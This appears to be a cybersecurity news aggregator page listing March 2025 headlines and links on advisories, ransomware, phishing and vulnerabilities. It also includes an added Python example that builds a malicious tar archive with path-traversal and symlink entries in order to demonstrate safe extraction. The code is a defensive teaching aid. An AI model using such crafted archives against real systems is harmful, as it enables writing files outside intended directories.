https://gbhackers.com/critical-ruby-saml-vulnerabilities/

Off the Beaten Path: Recent Unusual Malware
Three unusual malware samples analyzed here include an ISS backdoor developed in a rare language, a bootkit and a Windows implant of a post-exploit framework. The post Off the Beaten Path: Recent Unusual Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/unusual-malware/

Ongoing Cyber Attack Mimic Booking.com to Spread Password-Stealing Malware
Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com. The campaign, tracked as Storm-1865, employs a sophisticated social engineering technique called ClickFix to deliver credential-stealing malware designed to conduct financial fraud and theft. This attack specifically targets […] The post Ongoing Cyber Attack Mimic Booking.com to Spread Password-Stealing Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/ongoing-cyber-attack-mimic-booking-com/

USN-7328-3: Linux kernel vulnerabilities
Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - Block layer subsystem; (CVE-2024-56672)
https://ubuntu.com/security/notices/USN-7328-3

U.S. Charges LockBit Ransomware Developer in Cybercrime Crackdown
The U.S. Department of Justice has charged Rostislav Panev, a dual Russian and Israeli national, for his role as a developer of the notorious LockBit ransomware group. Panev, 51, was arrested in Israel in August following a U.S. provisional arrest request, and he is currently awaiting extradition to the United States. This action marks a […] The post U.S. Charges LockBit Ransomware Developer in Cybercrime Crackdown appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/u-s-charges-lockbit-ransomware-developer/

GraphQL Vulnerabilities: A Complete Guide to Security Testing and Advanced Exploitation Techniques
Disclaimer: This document is for educational purposes only. Exploiting systems without authorization is illegal and punishable by law. Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/graphql-vulnerabilities-a-complete-guide-to-security-testing-and-advanced-exploitation-techniques-5eb94af945c0?source=rss----7b722bfd1b8d---4

Flipper Zero Episode 1: What It Is, What You Can Do, and How to Set It Up?
Welcome to the first post in this Flipper Zero series! If you've ever been curious about this little hacking gadget, you're in the right place. Flipper Zero is a fun yet powerful multi-tool designed for security professionals, tinkerers, and tech enthusiasts alike. In this post, we'll cover Flipper Zero's features, what you can do with it, and how to set it up. What Is Flipper Zero? Flipper Zero is a pocket-sized cyber Swiss Army knife built for exploring and interacting with various types of hardware. Despite its toy-like appearance, it's packed with serious capabilities for hacking, testing, and experimenting with different wireless protocols and electronic devices. What's Inside? A peek inside the Flipper Zero. What Can You Do With Flipper Zero? From RFID cloning to controlling...
https://infosecwriteups.com/flipper-zero-episode-1-what-it-is-what-you-can-do-and-how-to-set-it-up-bb372e603baa?source=rss----7b722bfd1b8d---4

The art of hunting logical bugs: Exploiting business logic in modern apps
Introduction. Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/the-art-of-hunting-logical-bugs-exploiting-business-logic-in-modern-apps-a374c3650b90?source=rss----7b722bfd1b8d---4

JWT Security in 2025: Are We Finally Free from Leaks?
If you’ve been working with authentication systems for a while, you already know the deal with JWTs. They’re everywhere. From API… Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/jwt-security-in-2025-are-we-finally-free-from-leaks-3552fce24690?source=rss----7b722bfd1b8d---4

AI Chatbot DeepSeek R1 Can Be Manipulated to Create Malware
Tenable Research reveals that AI chatbot DeepSeek R1 can be manipulated to generate keyloggers and ransomware code. While…
https://hackread.com/ai-chatbot-deepseek-r1-manipulated-to-create-malware/

U.S. CISA adds Apple products and Juniper Junos OS flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple products and Juniper Junos OS flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2025-21590 is an Improper Isolation or Compartmentalization issue in the kernel of Juniper Networks Junos OS […]
https://securityaffairs.com/175381/security/u-s-cisa-adds-apple-juniper-junos-os-flaws-known-exploited-vulnerabilities-catalog.html

The News at D-2 (Specialist Press)

GitLab addressed critical auth bypass flaws in CE and EE
GitLab addressed two critical authentication bypass vulnerabilities in Community Edition (CE) and Enterprise Edition (EE). GitLab released security updates to address critical vulnerabilities in Community Edition (CE) and Enterprise Edition (EE). The company addressed nine vulnerabilities, including the two critical ruby-saml authentication bypass issues respectively tracked as CVE-2025-25291 and CVE-2025-25292. GitLab CE/EE versions 17.7.7, 17.8.5, […]
https://securityaffairs.com/175370/security/gitlab-addressed-critical-flaws-in-ce-and-ee.html

OBSCURE#BAT Malware Highlights Risks of API Hooking
Researchers discovered an attack chain that uses several layers of obfuscated batch files and PowerShell scripts to deliver an advanced and persistent rootkit.
https://www.darkreading.com/vulnerabilities-threats/obscurebat-malware-highlights-api-hooking

FBI, CISA Raise Alarms As Medusa Ransomware Attacks Grow
Medusa developers have been targeting a wide variety of critical infrastructure sectors, from healthcare and technology to manufacturing and insurance, racking up its victim count as it seemingly adds to its numbers of affiliates.
https://www.darkreading.com/cyberattacks-data-breaches/fbi-cisa-alarmed-medusa-ransomware-attacks-grow

FBI and CISA Urge Enabling 2FA to Counter Medusa Ransomware
FBI and CISA warn of Medusa ransomware attacks impacting critical infrastructure. Learn about Medusa’s tactics, prevention tips, and…
https://hackread.com/fbi-cisa-urge-enabling-2fa-counter-medusa-ransomware/

Microsoft apologizes for removing VSCode extensions used by millions
Microsoft has reinstated the 'Material Theme - Free' and 'Material Theme Icons - Free' extensions on the Visual Studio Marketplace after finding that the obfuscated code they contained wasn't actually malicious. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-apologizes-for-removing-vscode-extensions-used-by-millions/

The True Cost of Cybercrime: Why Global Damages Could Reach $1.2 – $1.5 Trillion by End of Year 2025
Introduction: The Escalating Economic Threat of Cybercrime Cybercrime is no longer just an IT problem—it has evolved into a global economic crisis, affecting corporations, governments, and individuals alike. With increasing... The post The True Cost of Cybercrime: Why Global Damages Could Reach $1.2 – $1.5 Trillion by End of Year 2025 appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-true-cost-of-cybercrime-why-global-damages-could-reach-1-2-1-5-trillion-by-end-of-year-2025/

New SuperBlack ransomware exploits Fortinet auth bypass flaws
A new ransomware operator named 'Mora_001' is exploiting two Fortinet vulnerabilities to gain unauthorized access to firewall appliances and deploy a custom ransomware strain dubbed SuperBlack. [...]
https://www.bleepingcomputer.com/news/security/new-superblack-ransomware-exploits-fortinet-auth-bypass-flaws/

Windows Notepad to get AI text summarization in Windows 11
Microsoft is now testing an AI-powered text summarization feature in Notepad and a Snipping Tool "Draw & Hold" feature that helps draw perfect shapes. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-notepad-to-get-ai-text-summarization-in-windows-11/

Ransomware Hits Record High: 126% Surge in Attacks in February 2025
February 2025 saw a record 126% surge in ransomware attacks, with Cl0p leading the charge. Hackers exploited file…
https://hackread.com/ransomware-attacks-hit-record-high-in-february-2025/

What Is Cybersecurity Risk? A Guide to Protect Your Business
Cybersecurity risk affects every business. A single cyber incident, such as a data breach or ransomware attack, can disrupt operations, expose sensitive data, and create costly compliance issues. The challenge is knowing which risks pose the biggest threat to your organization.
https://www.legitsecurity.com/blog/cybersecurity-risk

What Is Secure Coding? Best Practices and Techniques to Apply
Software vulnerabilities pose serious security and business risks. Writing secure code prevents these issues by integrating security into the development process. Instead of fixing vulnerabilities after deployment, developers apply secure coding practices from the start, reducing risk and building stronger, more resilient applications.
https://www.legitsecurity.com/blog/what-is-secure-coding

Microsoft says button to restore classic Outlook is broken
Microsoft is investigating a known issue that causes the new Outlook email client to crash when users click the "Go to classic Outlook" button, which should help them switch back to the classic Outlook. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-says-button-to-restore-classic-outlook-is-broken/

Strengthening the Human Firewall: Prioritising Mental Health in Cybersecurity Teams
There are few places more challenging than the frontlines of war. Danger lurks at every corner while enemy fire is a persistent threat. It's a hostile and stress-induced environment that demands unwavering focus, and where a single error can have disastrous consequences. Fortunately, the frontlines of war are a place most people won't encounter today. […] The post Strengthening the Human Firewall: Prioritising Mental Health in Cybersecurity Teams appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/13/strengthening-the-human-firewall-prioritising-mental-health-in-cybersecurity-teams/?utm_source=rss&utm_medium=rss&utm_campaign=strengthening-the-human-firewall-prioritising-mental-health-in-cybersecurity-teams

Cold Wallets vs. Hot Wallets: Which Offers Better Security?
Cryptocurrency isn't just a buzzword anymore. By December 2024, the number of global cryptocurrency owners reached approximately 659 million, marking a 13% increase from January 2024. That might not sound like a massive chunk, but it still represents millions of individuals who want to protect their virtual holdings. Where regular banking once ruled, self-managed wallets […] The post Cold Wallets vs. Hot Wallets: Which Offers Better Security? appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/13/cold-wallets-vs-hot-wallets-which-offers-better-security/?utm_source=rss&utm_medium=rss&utm_campaign=cold-wallets-vs-hot-wallets-which-offers-better-security

Check Point Software Celebrates Continued Partner Success at UK Partner Awards
Check Point® Software has announced the winners of its UK Partner Awards. The annual awards ceremony, which took place at One Moorgate Place on March 6th, 2025, celebrated the input of Check Point's affiliate companies and the growing partner community across the UK. The 2025 Check Point UK Partner Awards recognised the continued dedication of […] The post Check Point Software Celebrates Continued Partner Success at UK Partner Awards appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/13/check-point-software-celebrates-continued-partner-success-at-uk-partner-awards/?utm_source=rss&utm_medium=rss&utm_campaign=check-point-software-celebrates-continued-partner-success-at-uk-partner-awards

Juniper patches bug that let Chinese cyberspies backdoor routers
Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access. [...]
https://www.bleepingcomputer.com/news/security/juniper-patches-bug-that-let-chinese-cyberspies-backdoor-routers-since-mid-2024/

Consumer Groups Push IoT Security Bill to Address End-of-Life Concerns
Consumer Reports, Secure Resilient Future Foundation (SRFF), and US Public Interest Research Group (PIRG) have introduced a model bill to increase transparency around when Internet of Things devices no longer have manufacturer support.
https://www.darkreading.com/iot/consumer-groups-rally-to-address-iot-security-concerns

North Korea-linked APT group ScarCruft spotted using new Android spyware KoSpy
North Korea-linked APT group ScarCruft used a new Android spyware dubbed KoSpy to target Korean and English-speaking users. North Korea-linked threat actor ScarCruft (aka APT37, Reaper, and Group123) is behind a previously undetected Android surveillance tool named KoSpy that was used to target Korean and English-speaking users. ScarCruft has been active since at least 2012, it made the […]
https://securityaffairs.com/175357/malware/scarcruft-used-a-new-android-spyware-dubbed-kospy.html

GitLab patches critical authentication bypass vulnerabilities
GitLab released security updates for Community Edition (CE) and Enterprise Edition (EE), fixing nine vulnerabilities, among them two critical-severity ruby-saml library authentication bypass flaws. [...]
https://www.bleepingcomputer.com/news/security/gitlab-patches-critical-authentication-bypass-vulnerabilities/

How MSRC coordinates vulnerability research and disclosure while building community
Learn about the Microsoft Security Response Center, which investigates vulnerabilities and releases security updates to help protect customers from cyberthreats. The post How MSRC coordinates vulnerability research and disclosure while building community appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/13/how-msrc-coordinates-vulnerability-research-and-disclosure-while-building-community/

Car Exploit Allows You to Spy on Drivers in Real Time
Just like with any regular computer, researchers figured out how to crack into, force restart, and upload malware to an aftermarket in-vehicle infotainment system.
https://www.darkreading.com/vulnerabilities-threats/car-exploit-spy-drivers-real-time

HealthTech Database Exposed 108GB Medical and Employment Records
A misconfigured database exposed 108.8 GB of sensitive data, including information on over 86,000 healthcare workers affiliated with…
https://hackread.com/healthtech-database-exposed-medical-employment-records/

Setting the Record Straight: Debunking Myths About Mainframe Security in Cyber Strategies
Earlier this year, the modern mainframe celebrated its 60th anniversary, underscoring its ongoing significance. According to this 2024 Forrester report, 61% of global infrastructure hardware decision-makers confirm their firms still rely... The post Setting the Record Straight: Debunking Myths About Mainframe Security in Cyber Strategies appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/setting-the-record-straight-debunking-myths-about-mainframe-security-in-cyber-strategies/

ClickFix attack delivers infostealers, RATs in fake Booking.com emails
Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect hospitality workers with various malware, including infostealers and RATs. [...]
https://www.bleepingcomputer.com/news/security/clickfix-attack-delivers-infostealers-rats-in-fake-bookingcom-emails/

Mobile Security & Malware Issue, 2nd Week of March 2025
ASEC Blog publishes “Android Malware & Security Issue, 2nd Week of March 2025”
https://asec.ahnlab.com/en/86827/

Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware
Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […] The post Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/

Don’t let your kids on Roblox if you’re not comfortable, says Roblox CEO
To parents worried about their children's presence on Roblox, the CEO said don't let your kids be on Roblox.
https://www.malwarebytes.com/blog/news/2025/03/dont-let-your-kids-on-roblox-if-youre-worried-says-roblox-ceo

USN-7351-1: RESTEasy vulnerabilities
Nikos Papadopoulos discovered that RESTEasy improperly handled URL encoding when certain errors occur. An attacker could possibly use this issue to modify the app's behavior for other users through the network. (CVE-2020-10688) Mirko Selber discovered that RESTEasy improperly validated user input during HTTP response construction. This issue could possibly allow an attacker to cause a denial of service or execute arbitrary code. (CVE-2020-1695) It was discovered that RESTEasy unintentionally disclosed potentially sensitive server information to users during the handling of certain errors. (CVE-2020-25633) It was discovered that RESTEasy unintentionally disclosed parts of its code to users during the handling of certain errors. (CVE-2021-20289) It was discovered that RESTEasy used improper...
https://ubuntu.com/security/notices/USN-7351-1

Experts warn of a coordinated surge in the exploitation attempts of SSRF vulnerabilities
Researchers warn of a “coordinated surge” in the exploitation attempts of SSRF vulnerabilities in multiple platforms. Threat intelligence firm GreyNoise observed Grafana path traversal exploitation attempts before the Server-Side Request Forgery (SSRF) surge on March 9, suggesting the attackers may be leveraging Grafana as an initial entry point for deeper exploitation. The experts believe the […]
https://securityaffairs.com/175344/hacking/coordinated-surge-exploitation-attempts-ssrf-vulnerabilities.html

New OBSCURE#BAT Malware Targets Users with Fake Captchas
OBSCURE#BAT malware campaign exploits social engineering & fake software downloads to evade detection, steal data and persist on…
https://hackread.com/new-obscurebat-malware-targets-users-fake-captchas/

Salt Typhoon: A Wake-up Call for Critical Infrastructure
The Salt Typhoon attacks underscored the need for unity, innovation, and resilience in the face of an increasingly sophisticated cyber-threat landscape.
https://www.darkreading.com/cyberattacks-data-breaches/salt-typhoon-wake-up-call-critical-infrastructure

The Trillion Question: Can America's Cyber Czar Shrink The Skills Gap?
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Mar. 13, 2025. In Apr. 2019, Kristi Noem, Governor of South Dakota at the time, and now U.S. Secretary of Homeland Security (DHS), wrote that “the cost of cyberattacks is climbing, and The post The Trillion Question: Can America’s Cyber Czar Shrink The Skills Gap? appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-10-trillion-question-can-americas-cyber-czar-shrink-the-skills-gap/

Strength in Unity: OpenInfra & Linux Foundation Join to Revolutionize Open-source Security
Exciting news has just reached the open-source community: OpenStack, now known as the OpenInfra Foundation, is joining forces with the Linux Foundation. This significant move promises greater collaboration and operational efficiency throughout the community.
https://linuxsecurity.com/news/organizations-events/openinfra-linux-foundations-open-source-security

Guardians of AIoT: Protecting Smart Devices from Data Poisoning
What if the smart thermostat in your home decides that winter is the perfect time for you to experience tropical heat or your self-driving car interprets a stop sign as... The post Guardians of AIoT: Protecting Smart Devices from Data Poisoning appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/guardians-of-aiot-protecting-smart-devices-from-data-poisoning/

Why Critical MongoDB Library Flaws Won't See Mass Exploitation
Discover how to mitigate CVE-2024-53900 and CVE-2025-23061, which expose Node.js APIs to remote attacks.
https://www.f5.com/labs/articles/threat-intelligence/why-critical-mongodb-library-flaws-wont-see-mass-exploitation

Thinking about the security of AI systems
Why established cyber security principles are still important when developing or implementing machine learning models.
https://www.ncsc.gov.uk/blog-post/thinking-about-security-ai-systems

There's a hole in my bucket
...or 'Why do people leave sensitive data in unprotected AWS S3 buckets?'
https://www.ncsc.gov.uk/blog-post/theres-hole-my-bucket

The problems with patching
Applying patches may be a basic security principle, but that doesn't mean it's always easy to do in practice.
https://www.ncsc.gov.uk/blog-post/the-problems-with-patching

The strength of the ICS COI is the team
Join the Industrial Control System Community of Interest (ICS COI), and help build CNI expertise across the UK.
https://www.ncsc.gov.uk/blog-post/strength-of-ics-coi-is-the-team

The security benefits of modern collaboration in the cloud
By exploiting cloud services, organisations no longer have to choose between ‘more security' and ‘better usability'.
https://www.ncsc.gov.uk/blog-post/the-security-benefits-of-modern-collaboration-in-the-cloud

The problems with forcing regular password expiry
Why the NCSC decided to advise against this long-established security guideline.
https://www.ncsc.gov.uk/blog-post/problems-forcing-regular-password-expiry

The logic behind three random words
Whilst not a password panacea, using 'three random words' is still better than enforcing arbitrary complexity requirements.
https://www.ncsc.gov.uk/blog-post/the-logic-behind-three-random-words

The future of telecoms in the UK
NCSC Technical Director Dr Ian Levy explains how the security analysis behind the DCMS supply chain review will ensure the UK's telecoms networks are secure – regardless of the vendors used.
https://www.ncsc.gov.uk/blog-post/the-future-of-telecoms-in-the-uk

The future of Technology Assurance in the UK
Chris Ensor highlights some important elements of the NCSC's new Technology Assurance strategy.
https://www.ncsc.gov.uk/blog-post/future-of-technology-assurance-in-the-uk

The Cyber Assessment Framework 3.1
Latest version of the CAF focusses on clarification and consistency between areas of the CAF.
https://www.ncsc.gov.uk/blog-post/the-cyber-assessment-framework-3-1

Thanking the vulnerability research community with NCSC Challenge Coins
Reflecting on the positive impact of the Vulnerability Reporting Service – and introducing something new for selected contributors.
https://www.ncsc.gov.uk/blog-post/thanking-vulnerability-research-community-ncsc-challenge-coins

Terminology: it's not black and white
The NCSC now uses 'allow list' and 'deny list' in place of 'whitelist' and 'blacklist'. Emma W explains why...
https://www.ncsc.gov.uk/blog-post/terminology-its-not-black-and-white

Meta warns of actively exploited flaw in FreeType library
Meta warned that a vulnerability, tracked as CVE-2025-27363, impacting the FreeType library may have been exploited in the wild. Meta warned that an out-of-bounds write flaw, tracked as CVE-2025-27363 (CVSS score of 8.1), in the FreeType library may have been actively exploited in attacks. “An out of bounds write exists in FreeType versions 2.13.0 and below when attempting to […]
https://securityaffairs.com/175337/hacking/meta-warned-actively-exploited-cve-2025-27363.html

USN-7344-2: Linux kernel vulnerabilities
Chenyuan Yang discovered that the CEC driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2024-23848) Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - PowerPC architecture; - GPIO subsystem; - GPU drivers; - Media...
https://ubuntu.com/security/notices/USN-7344-2

INE Security Alert: Using AI-Driven Cybersecurity Training to Counter Emerging Threats
Cary, North Carolina, 13th March 2025, CyberNewsWire
https://hackread.com/ine-security-alert-using-ai-driven-cybersecurity-training-to-counter-emerging-threats/

USN-7328-2: Linux kernel vulnerabilities
Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - Block layer subsystem; (CVE-2024-56672)
https://ubuntu.com/security/notices/USN-7328-2

Head Mare and Twelve join forces to attack Russian entities
We analyze the activities of the Head Mare hacktivist group, which has been attacking Russian companies jointly with Twelve.
https://securelist.com/head-mare-twelve-collaboration/115887/

Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims
We identified a campaign spreading thousands of scam crypto investment platforms through websites and mobile apps, possibly through a standardized toolkit. The post Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fraud-crypto-platforms-campaign/

USN-7325-3: Linux kernel vulnerabilities
Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - Media drivers; (CVE-2024-53104)
https://ubuntu.com/security/notices/USN-7325-3

USN-7332-3: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - PowerPC architecture; - Block layer subsystem; - GPIO subsystem; - GPU drivers; - Media drivers; - Network drivers; - SCSI subsystem; - Direct Digital Synthesis drivers; - TTY drivers; - 9P distributed file system; - JFS file system; - NILFS2 file system; - File systems infrastructure; - BPF subsystem; - Netfilter; - Network sockets; - Memory management; - Amateur Radio drivers; - B.A.T.M.A.N. meshing protocol; - Bluetooth subsystem; - Ethernet bridge; - Networking core; - IPv4 networking; - IPv6 networking; - Netlink; - TIPC protocol; - Wireless networking; ...
https://ubuntu.com/security/notices/USN-7332-3

Modat launches premier product, Modat Magnify for Cybersecurity Professionals
The Hague, the Netherlands, 13th March 2025, CyberNewsWire
https://hackread.com/modat-launches-premier-product-modat-magnify-for-cybersecurity-professionals/

Medusa ransomware hit over 300 critical infrastructure organizations until February 2025
The Medusa ransomware operation hit over 300 organizations in critical infrastructure sectors in the United States until February 2025. The FBI, CISA, and MS-ISAC have issued a joint advisory detailing Medusa ransomware tactics, techniques, and indicators of compromise (IOCs) based on FBI investigations as recent as February 2025. This advisory is part of the #StopRansomware […]
https://securityaffairs.com/175319/cyber-crime/medusa-ransomware-hit-over-300-critical-infrastructure-organizations-until-february-2025.html

Bypassing Web Filters Part 2: Host Header Spoofing
In the last post about bypassing web filters, I discussed how SNI spoofing works and how this can also be prevented by web filters. This post is about another bypass technique called Host Header spoofing.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-2-host-header-spoofing/

News from previous days

Sign in as anyone: Bypassing SAML SSO authentication with parser differentials
Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. In this blog post, we'll shed light on how these vulnerabilities that rely on a parser differential were uncovered. The post Sign in as anyone: Bypassing SAML SSO authentication with parser differentials appeared first on The GitHub Blog.
https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/

USN-7343-2: Jinja2 regression
USN-7343-1 fixed vulnerabilities in Jinja2. The update introduced a regression when attempting to import Jinja2 on Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Rafal Krupinski discovered that Jinja2 did not properly restrict the execution of code in situations where templates are used maliciously. An attacker with control over a template's filename and content could potentially use this issue to enable the execution of arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2024-56201) It was discovered that Jinja2 sandboxed environments could be escaped through a call to a string format method. An attacker could possibly use this issue to enable the execution of arbitrary...
https://ubuntu.com/security/notices/USN-7343-2

Update your iPhone now: Apple patches vulnerability used in “extremely sophisticated attacks”
Apple has patched a vulnerability in iOS and iPadOS that was under active exploitation in extremely sophisticated attacks.
https://www.malwarebytes.com/blog/news/2025/03/update-your-iphone-now-apple-patches-vulnerability-used-in-extremely-sophisticated-attacks

USN-7350-1: UnRAR vulnerabilities
It was discovered that UnRAR incorrectly handled certain paths. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to write arbitrary files outside of the targeted directory. (CVE-2022-30333, CVE-2022-48579) It was discovered that UnRAR incorrectly handled certain recovery volumes. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to execute arbitrary code. (CVE-2023-40477) Siddharth Dushantha discovered that UnRAR incorrectly handled ANSI escape sequences when writing screen output. If a user or automated system were tricked into processing a specially crafted RAR archive, a remote attacker could possibly use this...
https://ubuntu.com/security/notices/USN-7350-1

USN-7349-1: RAR vulnerabilities
It was discovered that RAR incorrectly handled certain paths. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to write arbitrary files outside of the targeted directory. (CVE-2022-30333) It was discovered that RAR incorrectly handled certain recovery volumes. If a user or automated system were tricked into extracting a specially crafted RAR archive, a remote attacker could possibly use this issue to execute arbitrary code. (CVE-2023-40477)
https://ubuntu.com/security/notices/USN-7349-1
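
The two UnRAR/RAR advisories above describe the same failure class twice: an archive entry whose name traverses out of the extraction directory, and a symlink laid down by one entry that later entries are then written through. The following is an added example (not UnRAR's or Ubuntu's code) of an extractor that contains both, written in Python over a constructed tar archive because the checks are the same for any archive format. The sample entries, the scratch directory and the "regular files and directories only" policy are assumptions of this example.

```python
"""Added example: containing archive extraction inside the destination directory.

Two checks do the work: the destination-containment test on the resolved path, and a
refusal to create anything that is not a plain file or directory (symlinks, hardlinks,
device nodes).  Constructed archive and scratch directory; not UnRAR's implementation.
"""
import io
import os
import tarfile
import tempfile


def build_sample_archive() -> bytes:
    """Constructed malicious archive: one honest file plus hostile entries."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        add_file("docs/readme.txt", b"hello\n")
        add_file("../escape.txt", b"would land beside the destination\n")   # traversal
        add_file("/etc/evil", b"absolute entry name\n")                     # absolute path
        link = tarfile.TarInfo("docs/link")                                 # link out of dest
        link.type = tarfile.SYMTYPE
        link.linkname = "../.."
        tar.addfile(link)
        add_file("docs/link/owned.txt", b"written through the link if it existed\n")
    return buf.getvalue()


def safe_extract(archive: bytes, dest: str):
    """Extract only regular files and directories whose resolved path stays inside dest.

    Returns (extracted, rejected); rejected holds (name, reason) pairs."""
    dest_real = os.path.realpath(dest)
    extracted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for member in tar.getmembers():
            target = os.path.join(dest, member.name)
            # realpath follows any symlink already on disk, so a link planted by an
            # earlier entry is resolved before the containment test, not after it.
            resolved = os.path.realpath(target)
            inside = os.path.commonpath([dest_real, resolved]) == dest_real
            if os.path.isabs(member.name) or not inside:
                rejected.append((member.name, "escapes destination"))
            elif member.isdir():
                os.makedirs(target, exist_ok=True)
                extracted.append(member.name)
            elif member.isfile():
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as out:
                    out.write(tar.extractfile(member).read())
                extracted.append(member.name)
            else:
                # Never materialise links or devices: refusing them removes the
                # "write through a planted link" class outright.
                rejected.append((member.name, f"entry type {member.type!r} not allowed"))
    return extracted, rejected


def demo() -> dict:
    """Run safe_extract on the constructed archive inside a throwaway directory."""
    with tempfile.TemporaryDirectory() as scratch:
        dest = os.path.join(scratch, "out")
        os.makedirs(dest)
        extracted, rejected = safe_extract(build_sample_archive(), dest)
        # A traversal that worked would have put escape.txt next to "out".
        leaked = os.path.exists(os.path.join(scratch, "escape.txt"))
    return {"extracted": extracted, "rejected": [name for name, _ in rejected], "leaked": leaked}


if __name__ == "__main__":
    print(demo())
```

Because the symlink entry is refused, the later `docs/link/owned.txt` lands in a real directory inside the destination; had the link been created, `realpath` would have resolved through it and the containment test would still have rejected the write. On Python 3.12 and later `tarfile` offers `filter="data"` for extraction, which enforces a similar policy; the explicit version above runs unchanged on older interpreters.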

KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk
KnowBe4, a cybersecurity platform that comprehensively addresses human risk management, has released new research indicating that while 86% of employees believe they can confidently identify phishing emails, nearly half have fallen for scams. The study, which surveyed professionals across the UK, USA, Germany, France, Netherlands, and South Africa, reveals a growing gap between confidence and competence […] The post KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/12/knowbe4-research-reveals-a-confidence-gap-in-cybersecurity-putting-organisations-at-risk/?utm_source=rss&utm_medium=rss&utm_campaign=knowbe4-research-reveals-a-confidence-gap-in-cybersecurity-putting-organisations-at-risk

Best Practices and Risks Considerations in Automation like LCNC and RPA
Technologies such as Low-Code/No-Code (LCNC) and Robotic Process Automation (RPA) have become fundamental in the digital transformation of companies. They continue to evolve and redefine software development, providing new possibilities for different... The post Best Practices and Risks Considerations in Automation like LCNC and RPA appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/best-practices-and-risks-considerations-in-automation-like-lcnc-and-rpa/

Ransom & Dark Web Issues Week 2, March 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 2, March 2025. New ransomware group SecP0 demands ransom for corporate vulnerabilities. Pro-Palestinian hacktivist group RipperSec claims DDoS attacks on South Korean telecom companies, public institutions, and education-related websites. Pro-Palestinian hacktivist group Dark Storm Team claims large-scale DDoS attack on X. […]
